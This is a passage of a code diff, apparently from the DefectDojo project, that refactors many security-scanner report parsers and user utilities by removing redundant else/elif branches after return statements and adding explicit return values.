             if json_content.get("date") and json_content.get("projectName") and json_content.get("hotspotKeys"):
                 return SonarQubeSoprasteriaJSON().get_json_items(json_content, test, self.mode)
-            elif json_content.get("paging") and json_content.get("components"):
+            if json_content.get("paging") and json_content.get("components"):
                 return SonarQubeRESTAPIJSON().get_json_items(json_content, test, self.mode)
-            else:
-                return []
+            return []
         if file.name.endswith(".zip"):
             if str(file.__class__) == "<class '_io.TextIOWrapper'>":
                 input_zip = zipfile.ZipFile(file.name, "r")
             else:
                 input_zip = zipfile.ZipFile(file, "r")
             zipdata = {name: input_zip.read(name) for name in input_zip.namelist()}
             return SonarQubeRESTAPIZIP().get_items(zipdata, test, self.mode)
-        else:
-            parser = etree.HTMLParser()
-            tree = etree.parse(file, parser)
-            if self.mode not in [None, "detailed"]:
-                raise ValueError(
-                    "Internal error: Invalid mode "
-                    + self.mode
-                    + ". Expected: one of None, 'detailed'",
-                )
-            return SonarQubeSoprasteriaHTML().get_items(tree, test, self.mode)
+        parser = etree.HTMLParser()
+        tree = etree.parse(file, parser)
+        if self.mode not in [None, "detailed"]:
+            raise ValueError(
+                "Internal error: Invalid mode "
+                + self.mode
+                + ". Expected: one of None, 'detailed'",
+            )
+        return SonarQubeSoprasteriaHTML().get_items(tree, test, self.mode)
diff --git a/dojo/tools/sonarqube/sonarqube_restapi_json.py b/dojo/tools/sonarqube/sonarqube_restapi_json.py
index bb735f038c7..9a8e3bab226 100644
--- a/dojo/tools/sonarqube/sonarqube_restapi_json.py
+++ b/dojo/tools/sonarqube/sonarqube_restapi_json.py
@@ -233,12 +233,11 @@ def get_json_items(self, json_content, test, mode):
     def severitytranslator(self, severity):
         if severity == "BLOCKER":
             return "High"
-        elif severity == "MAJOR":
+        if severity == "MAJOR":
             return "Medium"
-        elif severity == "MINOR":
+        if severity == "MINOR":
             return "Low"
-        else:
-            return severity.lower().capitalize()
+        return severity.lower().capitalize()
 
     def returncomponent(self, json_content, key):
         components = json_content.get("components")
diff --git a/dojo/tools/sonarqube/soprasteria_helper.py b/dojo/tools/sonarqube/soprasteria_helper.py
index 47ddc3ddf79..2e7259e6376 100644
--- a/dojo/tools/sonarqube/soprasteria_helper.py
+++ b/dojo/tools/sonarqube/soprasteria_helper.py
@@ -14,16 +14,15 @@ def convert_sonar_severity(self, sonar_severity):
         sev = sonar_severity.lower()
         if sev == "blocker":
             return "Critical"
-        elif sev == "critical":
+        if sev == "critical":
             return "High"
-        elif sev == "major":
+        if sev == "major":
             return "Medium"
-        elif sev == "minor":
+        if sev == "minor":
             return "Low"
-        elif sev in ["high", "medium", "low"]:
+        if sev in ["high", "medium", "low"]:
             return sev.capitalize()
-        else:
-            return "Info"
+        return "Info"
 
     def get_description(self, vuln_details):
         rule_description = etree.tostring(
@@ -32,8 +31,7 @@ def get_description(self, vuln_details):
         rule_description = rule_description.split("<h2>See", 1)[0]
         rule_description = (str(rule_description)).replace("<h2>", "**")
         rule_description = (str(rule_description)).replace("</h2>
    ", "**") - rule_description = strip_tags(rule_description).strip() - return rule_description + return strip_tags(rule_description).strip() def get_references(self, rule_name, vuln_details): rule_references = rule_name @@ -46,8 +44,7 @@ def get_cwe(self, vuln_references): cweSearch = re.search("CWE-([0-9]*)", vuln_references, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 # Process one vuln from the report for "SonarQube Scan" # Create the finding and add it into the dupes list diff --git a/dojo/tools/sonatype/parser.py b/dojo/tools/sonatype/parser.py index e1b7bac1675..b82f1937c77 100644 --- a/dojo/tools/sonatype/parser.py +++ b/dojo/tools/sonatype/parser.py @@ -78,9 +78,8 @@ def get_finding(security_issue, component, test): def get_severity(vulnerability): if vulnerability["severity"] <= 3.9: return "Low" - elif vulnerability["severity"] <= 6.9: + if vulnerability["severity"] <= 6.9: return "Medium" - elif vulnerability["severity"] <= 8.9: + if vulnerability["severity"] <= 8.9: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ssh_audit/parser.py b/dojo/tools/ssh_audit/parser.py index 5245b791b5e..e1980a2e55b 100644 --- a/dojo/tools/ssh_audit/parser.py +++ b/dojo/tools/ssh_audit/parser.py @@ -23,14 +23,13 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" def get_findings(self, filename, test): items = [] diff --git a/dojo/tools/sslyze/parser.py b/dojo/tools/sslyze/parser.py index a80965f294b..a90edaa5db3 100644 --- a/dojo/tools/sslyze/parser.py +++ b/dojo/tools/sslyze/parser.py @@ -22,8 +22,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return SSLyzeXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return SSLyzeJSONParser().get_findings(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/sslyze/parser_json.py b/dojo/tools/sslyze/parser_json.py index 28ec63f9e4c..e8e03d1030b 100644 --- a/dojo/tools/sslyze/parser_json.py +++ b/dojo/tools/sslyze/parser_json.py @@ -71,12 +71,13 @@ class SSLyzeJSONParser: def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: @@ -403,7 +404,7 @@ def get_weak_protocol(cipher, text, node, test, endpoint): return get_finding( title, description, None, REFERENCES, test, endpoint, ) - elif "result" in weak_node: + if "result" in weak_node: weak_node_result = weak_node["result"] if ( "accepted_cipher_suites" in weak_node_result @@ -622,5 +623,4 @@ def get_endpoint(node): port = si_node["port"] if hostname is not None: return Endpoint(host=hostname, port=port) - else: - return None + return None diff --git a/dojo/tools/stackhawk/parser.py b/dojo/tools/stackhawk/parser.py index 99d708cdc80..20462d804de 100644 --- a/dojo/tools/stackhawk/parser.py +++ b/dojo/tools/stackhawk/parser.py @@ -33,9 +33,7 @@ def get_findings(self, json_output, test): completed_scan = self.__parse_json(json_output) metadata = StackHawkScanMetadata(completed_scan) - findings = 
self.__extract_findings(completed_scan, metadata, test) - - return findings + return self.__extract_findings(completed_scan, metadata, test) def __extract_findings( self, completed_scan, metadata: StackHawkScanMetadata, test, @@ -142,12 +140,11 @@ def __hyperlink(link: str) -> str: def __endpoint_status(status: str) -> str: if status == "NEW": return "** - New**" - elif status == "RISK_ACCEPTED": + if status == "RISK_ACCEPTED": return '** - Marked "Risk Accepted"**' - elif status == "FALSE_POSITIVE": + if status == "FALSE_POSITIVE": return '** - Marked "False Positive"**' - else: - return "" + return "" @staticmethod def __are_all_endpoints_in_status(paths, check_status: str) -> bool: diff --git a/dojo/tools/sysdig_reports/parser.py b/dojo/tools/sysdig_reports/parser.py index 2db34b4a526..f4241e3bdca 100644 --- a/dojo/tools/sysdig_reports/parser.py +++ b/dojo/tools/sysdig_reports/parser.py @@ -27,15 +27,14 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".csv"): arr_data = CSVParser().parse(filename=filename) return self.parse_csv(arr_data=arr_data, test=test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): scan_data = filename.read() try: data = json.loads(str(scan_data, "utf-8")) except Exception: data = json.loads(scan_data) return self.parse_json(data=data, test=test) - else: - return () + return () def parse_json(self, data, test): vulnerability = data.get("data", None) diff --git a/dojo/tools/tenable/csv_format.py b/dojo/tools/tenable/csv_format.py index 5949db58156..c1ea9fc2c8d 100644 --- a/dojo/tools/tenable/csv_format.py +++ b/dojo/tools/tenable/csv_format.py @@ -70,8 +70,7 @@ def detect_delimiter(self, content: str): first_line = content.split("\n")[0] if ";" in first_line: return ";" - else: - return "," # default to comma if no semicolon found + return "," # default to comma if no semicolon found def get_findings(self, filename: str, test: Test): # Read the CSV diff --git a/dojo/tools/tenable/parser.py b/dojo/tools/tenable/parser.py index 2c8e00c4687..e6809190a09 100644 --- a/dojo/tools/tenable/parser.py +++ b/dojo/tools/tenable/parser.py @@ -19,8 +19,7 @@ def get_findings(self, filename, test): ".xml", ) or filename.name.lower().endswith(".nessus"): return TenableXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return TenableCSVParser().get_findings(filename, test) - else: - msg = "Filename extension not recognized. Use .xml, .nessus or .csv" - raise ValueError(msg) + msg = "Filename extension not recognized. 
Use .xml, .nessus or .csv" + raise ValueError(msg) diff --git a/dojo/tools/trivy/parser.py b/dojo/tools/trivy/parser.py index defc54a9229..1fde84a80f0 100644 --- a/dojo/tools/trivy/parser.py +++ b/dojo/tools/trivy/parser.py @@ -57,18 +57,16 @@ def get_description_for_scan_types(self, scan_type): def convert_cvss_score(self, raw_value): if raw_value is None: return "Info" - else: - val = float(raw_value) - if val == 0.0: - return "Info" - elif val < 4.0: - return "Low" - elif val < 7.0: - return "Medium" - elif val < 9.0: - return "High" - else: - return "Critical" + val = float(raw_value) + if val == 0.0: + return "Info" + if val < 4.0: + return "Low" + if val < 7.0: + return "Medium" + if val < 9.0: + return "High" + return "Critical" def get_findings(self, scan_file, test): scan_data = scan_file.read() @@ -82,71 +80,69 @@ def get_findings(self, scan_file, test): if data is None: return [] # Legacy format with results - elif isinstance(data, list): + if isinstance(data, list): return self.get_result_items(test, data) - else: - schema_version = data.get("SchemaVersion", None) - artifact_name = data.get("ArtifactName", "") - cluster_name = data.get("ClusterName") - if schema_version == 2: - results = data.get("Results", []) - return self.get_result_items(test, results, artifact_name=artifact_name) - elif cluster_name: - findings = [] - vulnerabilities = data.get("Vulnerabilities", []) - for service in vulnerabilities: - namespace = service.get("Namespace") - kind = service.get("Kind") - name = service.get("Name") - service_name = "" - if namespace: - service_name = f"{namespace} / " - if kind: - service_name += f"{kind} / " - if name: - service_name += f"{name} / " - if len(service_name) >= 3: - service_name = service_name[:-3] - findings += self.get_result_items( - test, service.get("Results", []), service_name, - ) - misconfigurations = data.get("Misconfigurations", []) - for service in misconfigurations: - namespace = service.get("Namespace") - kind = service.get("Kind") - name = service.get("Name") - service_name = "" - if namespace: - service_name = f"{namespace} / " - if kind: - service_name += f"{kind} / " - if name: - service_name += f"{name} / " - if len(service_name) >= 3: - service_name = service_name[:-3] - findings += self.get_result_items( - test, service.get("Results", []), service_name, - ) - resources = data.get("Resources", []) - for resource in resources: - namespace = resource.get("Namespace") - kind = resource.get("Kind") - name = resource.get("Name") - if namespace: - resource_name = f"{namespace} / " - if kind: - resource_name += f"{kind} / " - if name: - resource_name += f"{name} / " - if len(resource_name) >= 3: - resource_name = resource_name[:-3] - findings += self.get_result_items( - test, resource.get("Results", []), resource_name, - ) - return findings - else: - msg = "Schema of Trivy json report is not supported" - raise ValueError(msg) + schema_version = data.get("SchemaVersion", None) + artifact_name = data.get("ArtifactName", "") + cluster_name = data.get("ClusterName") + if schema_version == 2: + results = data.get("Results", []) + return self.get_result_items(test, results, artifact_name=artifact_name) + if cluster_name: + findings = [] + vulnerabilities = data.get("Vulnerabilities", []) + for service in vulnerabilities: + namespace = service.get("Namespace") + kind = service.get("Kind") + name = service.get("Name") + service_name = "" + if namespace: + service_name = f"{namespace} / " + if kind: + service_name += f"{kind} / " + if name: + service_name += 
f"{name} / " + if len(service_name) >= 3: + service_name = service_name[:-3] + findings += self.get_result_items( + test, service.get("Results", []), service_name, + ) + misconfigurations = data.get("Misconfigurations", []) + for service in misconfigurations: + namespace = service.get("Namespace") + kind = service.get("Kind") + name = service.get("Name") + service_name = "" + if namespace: + service_name = f"{namespace} / " + if kind: + service_name += f"{kind} / " + if name: + service_name += f"{name} / " + if len(service_name) >= 3: + service_name = service_name[:-3] + findings += self.get_result_items( + test, service.get("Results", []), service_name, + ) + resources = data.get("Resources", []) + for resource in resources: + namespace = resource.get("Namespace") + kind = resource.get("Kind") + name = resource.get("Name") + if namespace: + resource_name = f"{namespace} / " + if kind: + resource_name += f"{kind} / " + if name: + resource_name += f"{name} / " + if len(resource_name) >= 3: + resource_name = resource_name[:-3] + findings += self.get_result_items( + test, resource.get("Results", []), resource_name, + ) + return findings + msg = "Schema of Trivy json report is not supported" + raise ValueError(msg) def get_result_items(self, test, results, service_name=None, artifact_name=""): items = [] diff --git a/dojo/tools/trufflehog/parser.py b/dojo/tools/trufflehog/parser.py index 9dd8234d09a..c51f3f8163e 100644 --- a/dojo/tools/trufflehog/parser.py +++ b/dojo/tools/trufflehog/parser.py @@ -26,10 +26,9 @@ def get_findings(self, filename, test): if "SourceMetadata" in json_data: return self.get_findings_v3(dict_strs, test) - elif "path" in json_data: + if "path" in json_data: return self.get_findings_v2(dict_strs, test) - else: - return [] + return [] def get_findings_v2(self, data, test): dupes = {} @@ -210,6 +209,5 @@ def walk_dict(self, obj, tab_count=1): value, tab_count=(tab_count + 1), ) continue - else: - return_string += f"{tab_string}{key}: {value}\n" + return_string += f"{tab_string}{key}: {value}\n" return return_string diff --git a/dojo/tools/trustwave_fusion_api/parser.py b/dojo/tools/trustwave_fusion_api/parser.py index 53358b26880..8ee522acc35 100644 --- a/dojo/tools/trustwave_fusion_api/parser.py +++ b/dojo/tools/trustwave_fusion_api/parser.py @@ -49,12 +49,11 @@ def convert_severity(self, num_severity): """Convert severity value""" if num_severity >= -10: return "Low" - elif -11 >= num_severity > -26: + if -11 >= num_severity > -26: return "Medium" - elif num_severity <= -26: + if num_severity <= -26: return "High" - else: - return "Info" + return "Info" def get_item(vuln, test): diff --git a/dojo/tools/twistlock/parser.py b/dojo/tools/twistlock/parser.py index 53a7f21fd16..740d72f8e68 100644 --- a/dojo/tools/twistlock/parser.py +++ b/dojo/tools/twistlock/parser.py @@ -67,7 +67,7 @@ def parse_issue(self, row, test): def parse(self, filename, test): if filename is None: - return + return None content = filename.read() dupes = {} if isinstance(content, bytes): @@ -190,16 +190,15 @@ def get_item(vulnerability, test): def convert_severity(severity): if severity.lower() == "important": return "High" - elif severity.lower() == "moderate": + if severity.lower() == "moderate": return "Medium" - elif severity.lower() == "information": + if severity.lower() == "information": return "Info" - elif severity.lower() == "informational": + if severity.lower() == "informational": return "Info" - elif severity == "": + if severity == "": return "Info" - else: - return severity.title() + 
return severity.title() class TwistlockParser: @@ -218,8 +217,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return TwistlockJsonParser().parse(filename, test) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return TwistlockCSVParser().parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/utils.py b/dojo/tools/utils.py index 1a4ab328d21..f18b1f4f16e 100644 --- a/dojo/tools/utils.py +++ b/dojo/tools/utils.py @@ -16,7 +16,7 @@ def get_npm_cwe(item_node): if cwe_node: if isinstance(cwe_node, list): return int(cwe_node[0][4:]) - elif cwe_node.startswith("CWE-"): + if cwe_node.startswith("CWE-"): cwe_string = cwe_node[4:] if cwe_string: return int(cwe_string) diff --git a/dojo/tools/vcg/parser.py b/dojo/tools/vcg/parser.py index 0d29448a2ce..7b35eb81ddb 100644 --- a/dojo/tools/vcg/parser.py +++ b/dojo/tools/vcg/parser.py @@ -65,8 +65,7 @@ def get_field_from_xml(issue, field): and issue.find(field).text is not None ): return issue.find(field).text - else: - return None + return None def __init__(self): pass @@ -97,8 +96,7 @@ def parse_issue(self, issue, test): data.code_line = self.get_field_from_xml(issue, "CodeLine") # data.line = self.get_field_from_xml(issue, 'CodeLine') - finding = data.to_finding(test) - return finding + return data.to_finding(test) def parse(self, content, test): dupes = {} @@ -133,8 +131,7 @@ class VCGCsvParser: def get_field_from_row(row, column): if row[column] is not None: return row[column] - else: - return None + return None def parse_issue(self, row, test): if not row: @@ -168,8 +165,7 @@ def parse_issue(self, row, test): data.line = self.get_field_from_row(row, line_column) data.code_line = self.get_field_from_row(row, code_line_column) - finding = data.to_finding(test) - return finding + return data.to_finding(test) def parse(self, content, test): dupes = {} @@ -219,8 +215,7 @@ def get_findings(self, filename, test): # 'utf-8' This line was added to pass a unittest in test_parsers.TestParsers.test_file_existence. 
if filename.name.lower().endswith(".xml"): return list(VCGXmlParser().parse(content, test).values()) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return list(VCGCsvParser().parse(content, test).values()) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/veracode/json_parser.py b/dojo/tools/veracode/json_parser.py index fe707b964c1..fe48bbb46fd 100644 --- a/dojo/tools/veracode/json_parser.py +++ b/dojo/tools/veracode/json_parser.py @@ -133,9 +133,9 @@ def create_finding_from_details(self, finding_details, scan_type, policy_violate # Fill in extra info based on the scan type if scan_type == "STATIC": return self.add_static_details(finding, finding_details, backup_title=cwe_title) - elif scan_type == "DYNAMIC": + if scan_type == "DYNAMIC": return self.add_dynamic_details(finding, finding_details, backup_title=cwe_title) - elif scan_type == "SCA": + if scan_type == "SCA": return self.add_sca_details(finding, finding_details, backup_title=cwe_title) return None diff --git a/dojo/tools/veracode/parser.py b/dojo/tools/veracode/parser.py index ec3f5ba00d9..80f2e68c186 100644 --- a/dojo/tools/veracode/parser.py +++ b/dojo/tools/veracode/parser.py @@ -17,8 +17,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return VeracodeXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return VeracodeJSONParser().get_findings(filename, test) - else: - msg = "Filename extension not recognized. Use .xml or .json" - raise ValueError(msg) + msg = "Filename extension not recognized. 
Use .xml or .json" + raise ValueError(msg) diff --git a/dojo/tools/veracode/xml_parser.py b/dojo/tools/veracode/xml_parser.py index b53493fef5e..25908491739 100644 --- a/dojo/tools/veracode/xml_parser.py +++ b/dojo/tools/veracode/xml_parser.py @@ -272,8 +272,7 @@ def _get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return None + return None @classmethod def __xml_sca_flaw_to_finding( diff --git a/dojo/tools/veracode_sca/parser.py b/dojo/tools/veracode_sca/parser.py index 8058bbae8fc..66c7e36ca89 100644 --- a/dojo/tools/veracode_sca/parser.py +++ b/dojo/tools/veracode_sca/parser.py @@ -237,11 +237,10 @@ def fix_severity(self, severity): def __cvss_to_severity(cls, cvss): if cvss >= 9: return cls.vc_severity_mapping.get(5) - elif cvss >= 7: + if cvss >= 7: return cls.vc_severity_mapping.get(4) - elif cvss >= 4: + if cvss >= 4: return cls.vc_severity_mapping.get(3) - elif cvss > 0: + if cvss > 0: return cls.vc_severity_mapping.get(2) - else: - return cls.vc_severity_mapping.get(1) + return cls.vc_severity_mapping.get(1) diff --git a/dojo/tools/wapiti/parser.py b/dojo/tools/wapiti/parser.py index deb6309d5af..3b6c6dfd4fd 100644 --- a/dojo/tools/wapiti/parser.py +++ b/dojo/tools/wapiti/parser.py @@ -108,5 +108,4 @@ def get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return None + return None diff --git a/dojo/tools/wfuzz/parser.py b/dojo/tools/wfuzz/parser.py index 41d4ebeee69..2042fe5c17d 100644 --- a/dojo/tools/wfuzz/parser.py +++ b/dojo/tools/wfuzz/parser.py @@ -15,12 +15,13 @@ class WFuzzParser: def severity_mapper(self, input): if 200 <= int(input) <= 299: return "High" - elif 300 <= int(input) <= 399: + if 300 <= int(input) <= 399: return "Low" - elif 400 <= int(input) <= 499: + if 400 <= int(input) <= 499: return "Medium" - elif 500 <= int(input): + if 500 <= int(input): return "Low" + return None def get_scan_types(self): return ["WFuzz JSON report"] diff --git a/dojo/tools/whitehat_sentinel/parser.py b/dojo/tools/whitehat_sentinel/parser.py index eeb97ee8f5e..0c5ca4ff024 100644 --- a/dojo/tools/whitehat_sentinel/parser.py +++ b/dojo/tools/whitehat_sentinel/parser.py @@ -42,7 +42,7 @@ def get_findings(self, file, test): # Convert a WhiteHat Vuln with Attack Vectors to a list of DefectDojo # findings - dojo_findings = self._convert_whitehat_sentinel_vulns_to_dojo_finding( + return self._convert_whitehat_sentinel_vulns_to_dojo_finding( findings_collection["collection"], test, ) @@ -51,7 +51,6 @@ def get_findings(self, file, test): # # # Append DefectDojo findings to list # dojo_findings.append(dojo_finding) - return dojo_findings def _convert_whitehat_severity_id_to_dojo_severity( self, whitehat_severity_id: int, @@ -87,6 +86,7 @@ def _parse_cwe_from_tags(self, whitehat_sentinel_tags) -> str: for tag in whitehat_sentinel_tags: if tag.startswith("CWE-"): return tag.split("-")[1] + return None def _parse_description(self, whitehat_sentinel_description: dict): """ diff --git a/dojo/tools/wiz/parser.py b/dojo/tools/wiz/parser.py index f3125544748..ff98d94e499 100644 --- a/dojo/tools/wiz/parser.py +++ b/dojo/tools/wiz/parser.py @@ -204,6 +204,5 @@ def get_findings(self, filename, test): return WizParserByTitle().parse_findings(test, reader) if all(field in reader.fieldnames for field in ["Name", "DetailedName"]): return WizParserByDetailedName().parse_findings(test, reader) - else: - msg = "This CSV format of Wiz is not supported" - raise 
ValueError(msg) + msg = "This CSV format of Wiz is not supported" + raise ValueError(msg) diff --git a/dojo/tools/xanitizer/parser.py b/dojo/tools/xanitizer/parser.py index 7ec42343a62..b6a7cabdd55 100644 --- a/dojo/tools/xanitizer/parser.py +++ b/dojo/tools/xanitizer/parser.py @@ -24,8 +24,7 @@ def get_findings(self, filename, test): root = self.parse_xml(filename) if root is not None: return self.get_findings_internal(root, test) - else: - return [] + return [] def parse_xml(self, filename): try: @@ -161,7 +160,7 @@ def generate_file_path(self, finding): "relativePath", ): return finding.find("endNode").get("relativePath") - elif finding.find("node") is not None and finding.find("node").get( + if finding.find("node") is not None and finding.find("node").get( "relativePath", ): return finding.find("node").get("relativePath") diff --git a/dojo/tools/yarn_audit/parser.py b/dojo/tools/yarn_audit/parser.py index b13c2ffd684..8bc0c8adfd7 100644 --- a/dojo/tools/yarn_audit/parser.py +++ b/dojo/tools/yarn_audit/parser.py @@ -25,13 +25,12 @@ def get_findings(self, json_output, test): lines = lines.split("\n") tree = (json.loads(line) for line in lines if "{" in line) return self.get_items_yarn(tree, test) - elif '"value"' in lines: + if '"value"' in lines: lines = lines.split("\n") tree = (json.loads(line) for line in lines if "{" in line) return self.get_items_yarn2(tree, test) - else: - tree = json.loads(lines) - return self.get_items_auditci(tree, test) + tree = json.loads(lines) + return self.get_items_auditci(tree, test) def get_items_yarn(self, tree, test): items = {} diff --git a/dojo/user/utils.py b/dojo/user/utils.py index 9d4f0949d8e..2ba2cbc1d0f 100644 --- a/dojo/user/utils.py +++ b/dojo/user/utils.py @@ -13,42 +13,37 @@ def __init__(self, *args, **kwargs): def display_name(self): if self.name == "bannerconf": return "Login Banner" - elif self.name == "cred user": + if self.name == "cred user": return "Credentials" - elif self.name == "github conf": + if self.name == "github conf": return "GitHub Configurations" - elif self.name == "engagement survey": + if self.name == "engagement survey": return "Questionnaires" - elif self.name == "permission": + if self.name == "permission": return "Configuration Permissions" - elif self.name == "sla configuration": + if self.name == "sla configuration": return "SLA Configurations" - else: - return self.name.title() + "s" + return self.name.title() + "s" def view_codename(self): if self.view: return f'view_{self.name.replace(" ", "_")}' - else: - return None + return None def add_codename(self): if self.add: return f'add_{self.name.replace(" ", "_")}' - else: - return None + return None def change_codename(self): if self.change: return f'change_{self.name.replace(" ", "_")}' - else: - return None + return None def delete_codename(self): if self.delete: return f'delete_{self.name.replace(" ", "_")}' - else: - return None + return None def codenames(self): codenames = [] @@ -95,7 +90,7 @@ def get_configuration_permissions_fields(): questionnaire_permissions = [] rules_permissions = [] - permission_fields = [ + return [ Permission_Helper(name="cred user", app="dojo", view=True, add=True, change=True, delete=True), Permission_Helper(name="development environment", app="dojo", add=True, change=True, delete=True), Permission_Helper(name="finding template", app="dojo", view=True, add=True, change=True, delete=True), @@ -118,8 +113,6 @@ def get_configuration_permissions_fields(): Permission_Helper(name="user", app="auth", view=True, add=True, change=True, 
delete=True), ] - return permission_fields - def get_configuration_permissions_codenames(): codenames = [] diff --git a/dojo/user/validators.py b/dojo/user/validators.py index c393dc41c9d..83ee954419e 100644 --- a/dojo/user/validators.py +++ b/dojo/user/validators.py @@ -13,8 +13,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_too_short") - else: - return None + return def get_help_text(self): return gettext("Password must be at least %s characters long.") % get_system_setting("minimum_password_length") @@ -26,8 +25,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_too_short") - else: - return None + return def get_help_text(self): return gettext("Password must be less than %s characters long.") % get_system_setting("maximum_password_length") @@ -39,8 +37,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_number") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 digit, 0-9.") @@ -52,8 +49,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_upper") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 uppercase letter, A-Z.") @@ -65,8 +61,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_lower") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 lowercase letter, a-z.") @@ -79,8 +74,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_symbol") - else: - return None + return def get_help_text(self): return gettext("The password must contain at least 1 special character, " @@ -91,5 +85,4 @@ class DojoCommonPasswordValidator(CommonPasswordValidator): def validate(self, password, user=None): if get_system_setting("non_common_password_required"): return super().validate(password, user) - else: - return None + return None diff --git a/dojo/user/views.py b/dojo/user/views.py index 1034b4c3638..f43b6b7b600 100644 --- a/dojo/user/views.py +++ b/dojo/user/views.py @@ -158,13 +158,12 @@ def logout_view(request): if not settings.SHOW_LOGIN_FORM: return login_view(request) - else: - messages.add_message(request, - messages.SUCCESS, - _("You have logged out successfully."), - extra_tags="alert-success") + messages.add_message(request, + messages.SUCCESS, + _("You have logged out successfully."), + extra_tags="alert-success") - return HttpResponseRedirect(reverse("login")) + return HttpResponseRedirect(reverse("login")) @user_passes_test(lambda u: u.is_active) diff --git a/dojo/utils.py b/dojo/utils.py index 9446888b3e3..683bec737fc 100644 --- a/dojo/utils.py +++ b/dojo/utils.py @@ -180,7 +180,7 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t .order_by("id") ) - elif deduplication_algorithm == "unique_id_from_tool": + if deduplication_algorithm == "unique_id_from_tool": return ( Finding.objects.filter( **custom_filter, @@ -190,7 +190,7 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t .order_by("id") ) - elif deduplication_algorithm == "unique_id_from_tool_or_hash_code": + if deduplication_algorithm == "unique_id_from_tool_or_hash_code": query = Finding.objects.filter( Q(**custom_filter), ( @@ -201,7 +201,7 @@ def 
match_finding_to_existing_findings(finding, product=None, engagement=None, t deduplicationLogger.debug(query.query) return query - elif deduplication_algorithm == "legacy": + if deduplication_algorithm == "legacy": # This is the legacy reimport behavior. Although it's pretty flawed and # doesn't match the legacy algorithm for deduplication, this is left as is for simplicity. # Re-writing the legacy deduplication here would be complicated and counter-productive. @@ -216,9 +216,8 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t ).order_by("id") ) - else: - logger.error("Internal error: unexpected deduplication_algorithm: '%s' ", deduplication_algorithm) - return None + logger.error("Internal error: unexpected deduplication_algorithm: '%s' ", deduplication_algorithm) + return None # true if both findings are on an engagement that have a different "deduplication on engagement" configuration @@ -321,6 +320,7 @@ def do_dedupe_finding(new_finding, *args, **kwargs): deduplicate_legacy(new_finding) else: deduplicationLogger.debug("dedupe: skipping dedupe because it's disabled in system settings get()") + return None def deduplicate_legacy(new_finding): @@ -713,8 +713,7 @@ def add_breadcrumb(parent=None, if clear: request.session["dojo_breadcrumbs"] = None return - else: - crumbs = request.session.get("dojo_breadcrumbs", None) + crumbs = request.session.get("dojo_breadcrumbs", None) if top_level or crumbs is None: crumbs = [ @@ -842,27 +841,26 @@ def get_punchcard_data(objs, start_date, weeks, view="Finding"): if created < start_of_week: raise ValueError("date found outside supported range: " + str(created)) + if created >= start_of_week and created < start_of_next_week: + # add day count to current week data + day_counts[day_offset[created.weekday()]] = day_count + highest_day_count = max(highest_day_count, day_count) else: - if created >= start_of_week and created < start_of_next_week: - # add day count to current week data - day_counts[day_offset[created.weekday()]] = day_count - highest_day_count = max(highest_day_count, day_count) - else: - # created >= start_of_next_week, so store current week, prepare for next - while created >= start_of_next_week: - week_data, label = get_week_data(start_of_week, tick, day_counts) - punchcard.extend(week_data) - ticks.append(label) - tick += 1 - - # new week, new values! - day_counts = [0, 0, 0, 0, 0, 0, 0] - start_of_week = start_of_next_week - start_of_next_week += relativedelta(weeks=1) - - # finally a day that falls into the week bracket - day_counts[day_offset[created.weekday()]] = day_count - highest_day_count = max(highest_day_count, day_count) + # created >= start_of_next_week, so store current week, prepare for next + while created >= start_of_next_week: + week_data, label = get_week_data(start_of_week, tick, day_counts) + punchcard.extend(week_data) + ticks.append(label) + tick += 1 + + # new week, new values! 
